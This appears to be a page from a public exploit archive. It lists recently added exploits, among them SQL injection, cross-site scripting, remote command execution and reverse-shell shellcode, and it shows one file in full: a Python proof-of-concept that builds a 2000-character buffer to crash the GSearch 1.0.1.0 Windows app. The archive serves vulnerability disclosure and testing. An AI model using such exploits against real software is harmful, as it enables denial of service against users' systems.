97334ae3af
9 changes to exploits/shellcodes GSearch 1.0.1.0 - Denial of Service (PoC) Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation dotProject 2.1.9 - SQL Injection SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting SeedDMS versions < 5.1.11 - Remote Command Execution GrandNode 4.40 - Path Traversal / Arbitrary File Download Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode
26 lines
No EOL
727 B
Text
26 lines
No EOL
727 B
Text
# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
|
|
# Date: 6/23/2019
|
|
# Author: 0xB9
|
|
# Twitter: @0xB9Sec
|
|
# Contact: 0xB9[at]pm.me
|
|
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
|
|
# Version: 1.0.1.0
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# Run the python script, it will create a new file "PoC.txt"
|
|
# Copy the text from the generated PoC.txt file to clipboard
|
|
# Paste the text in the search bar and click search
|
|
# Click any link and app will crash
|
|
|
|
|
|
buffer = "A" * 2000
|
|
payload = buffer
|
|
try:
|
|
f = open("PoC.txt", "w")
|
|
print("[+] Creating payload..")
|
|
f.write(payload)
|
|
f.close()
|
|
print("[+] File created!")
|
|
except:
|
|
print("File cannot be created") |